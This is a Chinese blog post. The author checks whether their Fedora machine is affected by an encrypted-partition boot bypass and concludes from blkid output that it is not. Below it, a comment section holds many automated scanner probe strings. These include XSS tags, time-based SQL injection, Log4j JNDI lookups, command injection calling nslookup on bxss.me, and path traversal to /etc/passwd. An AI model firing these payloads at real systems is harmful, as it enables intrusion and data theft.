刚开始看到这个漏洞时,简直无法相信——我靠,逆天大后门?然后在自己的机器上狂按了几分钟,手都快脱臼了,得到的反馈却只有不断重复的 /etc/issue 信息:
\
\ __---__
_- /--______
__--( / \ )XXXXXXXXXXX\v.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\
/XXXXX( )--_ XXXXXXXXXXX\
/XXXXX/ ( O ) XXXXXX \XXXXX\
XXXXX/ / XXXXXX \__ \XXXXX
XXXXXX__/ XXXXXX \__---->
---___ XXX__/ XXXXXX \__ /
\- --__/ ___/\ XXXXXX / ___--/=
\-\ ___/ XXXXXX '--- XXXXXX
\-\/XXX\ XXXXXX /XXXXX
\XXXXXXXXX \ /XXXXX/
\XXXXXX > _/XXXXX/
\XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
\XXXXXXXXXXXXXXXXXXXXXXXXXX/
VXXXXXXXXXXXXXXXXXXV
是不是很萌~。~
最后看了原文才发现,触发此漏洞需要一个前提条件:系统使用了加密分区。于是查看了一下本机的分区情况:
/dev/sda1: LABEL="Windows7_0S" UUID="E4B85589B8555ADE" TYPE="ntfs" PARTUUID="167b5d84-01"
/dev/sda2: UUID="wQ04tk-pZSp-nRFw-m0ii-4L2Y-9ie8-gM5hyp" TYPE="LVM2_member" PARTUUID="167b5d84-02"
/dev/sda3: UUID="12c245f2-6788-4e6d-b60d-aa5e795bdfb2" TYPE="ext4" PARTUUID="167b5d84-03"
/dev/sda5: UUID="Xzgqfc-JSJE-Wdhm-TLn6-dfK6-YbnR-ZZgsED" TYPE="LVM2_member" PARTUUID="167b5d84-05"
/dev/mapper/fedora-swap: UUID="515583ce-7cc4-41ce-8241-0c756f963f43" TYPE="swap"
/dev/mapper/fedora-root: UUID="e52e1aa2-f581-464c-af9e-eeebf9d69d47" TYPE="ext4"
/dev/mapper/fedora-home: UUID="8ff0838e-39b0-4e2b-b10c-0cb66901cddf" TYPE="ext4"
/dev/loop0: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
/dev/mapper/docker-253:1-2363736-pool: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
上面的输出里没有任何加密分区(比如 TYPE="crypto_LUKS" 的条目),本机不满足触发条件,可以安心午睡了。
评论(以下内容是自动化 Web 漏洞扫描器向评论表单提交的探测字符串,并非真实读者评论)
<esi:include src="http://bxss.me/rpb.png"/>
${9999491+9999370}
9TcySDqd
${j${::-n}di:dns${::-:}//hitizsghhbmew3fe5a${::-.}bxss.me}zzzz
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
response.write(9459926*9802430)
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
'+response.write(9459926*9802430)+'
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-1245..2ea7a${::-.}1${::-.}bxss.me}}
&n947560=v976800
"+response.write(9459926*9802430)+"
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
!(()&&!|*|*|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
^(#$!@#$)(()))******
/xfs.bxss.me
ctime sleep p0 (I30 tp1 Rp2 .
'.gethostbyname(lc('hitwn'.'vmkfoddu62ee7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(81).chr(106).chr(89).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1epmGgCEO
".gethostbyname(lc("hitfj"."eqbzzhcz6accf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(90).chr(116).chr(79)."
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
echo snihcc$()\ axutjs\nz^xyu||a #' &echo snihcc$()\ axutjs\nz^xyu||a #|" &echo snihcc$()\ axutjs\nz^xyu||a #
&echo ohnqzg$()\ wgtran\nz^xyu||a #' &echo ohnqzg$()\ wgtran\nz^xyu||a #|" &echo ohnqzg$()\ wgtran\nz^xyu||a #
'.print(md5(31337)).'
"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(97).concat(89)+(require"socket" Socket.gethostbyname("hitgn"+"qrkzswhf13951.bxss.me.")[3].to_s)+"
|echo hrnmit$()\ kfnarv\nz^xyu||a #' |echo hrnmit$()\ kfnarv\nz^xyu||a #|" |echo hrnmit$()\ kfnarv\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
(nslookup hitrmdnqsegvc96b2b.bxss.me||perl -e "gethostbyname('hitrmdnqsegvc96b2b.bxss.me')")
'+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(113).concat(89)+(require'socket' Socket.gethostbyname('hitiw'+'hojfygvy1424e.bxss.me.')[3].to_s)+'
bxss.me/t/xss.html?%00
$(nslookup hitttnvvkimjr8b25b.bxss.me||perl -e "gethostbyname('hitttnvvkimjr8b25b.bxss.me')")
&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&'\"`0&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&`'
comments
|(nslookup hitptrhjwqczs5aea2.bxss.me||perl -e "gethostbyname('hitptrhjwqczs5aea2.bxss.me')")
comments/.
`(nslookup hitlilbmtcdxf20f94.bxss.me||perl -e "gethostbyname('hitlilbmtcdxf20f94.bxss.me')")`
'"()&%<acx><ScRiPt >NmfC(9110)</ScRiPt>
'"()&%<acx><ScRiPt >NmfC(9357)</ScRiPt>
9683127
acu2547<s1﹥s2ʺs3ʹuca2547
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >NmfC(9055)</ScRiPt>
<WDG708>HB98Z[!+!]</WDG708>
<script>NmfC(9000)</script>
<ScR<ScRiPt>IpT>NmfC(9121)</sCr<ScRiPt>IpT>
<ScRiPt >NmfC(9689)</ScRiPt>
<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9416></ScRiPt>
<isindex type=image src=1 onerror=NmfC(9629)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'>
<body onload=NmfC(9661)>
<img src=//xss.bxss.me/t/dot.gif onload=NmfC(9378)>
<img src=xyz OnErRor=NmfC(9610)>
<img/src=">" onerror=alert(9420)>
%0A%3C%53%63%52%69%50%74%20%3E%4E%6D%66%43%289552%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\NmfC(9963)\u003C/sCripT\u003E
<ScRiPt>NmfC(9205)</sCripT>
<input autofocus onfocus=NmfC(9082)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{acu:Expre/**/SSion(NmfC(9901))}
Yvczs <ScRiPt >NmfC(9614)</ScRiPt>
<WY1QYQ>VOCVM[!+!]</WY1QYQ>
<ifRAme sRc=9992.com></IfRamE>
<a36Fqu6 x=9286>
<img sRc='http://attacker-9109/log.php?
<aLeiGdL<
7FhewNKH
-1 OR 2+11-11-1=0+0+0+1 --
-1 OR 2+784-784-1=0+0+0+1
-1' OR 2+660-660-1=0+0+0+1 --
-1' OR 2+926-926-1=0+0+0+1 or 'jZftvM15'='
-1" OR 2+941-941-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
QTXkDb35'; waitfor delay '0:0:15' --
-5 OR 98=(SELECT 98 FROM PG_SLEEP(15))--
-5) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
-1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
Gj95kppB' OR 313=(SELECT 313 FROM PG_SLEEP(15))--
yZGlmzI3') OR 837=(SELECT 837 FROM PG_SLEEP(15))--
heXJ4bHM')) OR 397=(SELECT 397 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
@@OmJI1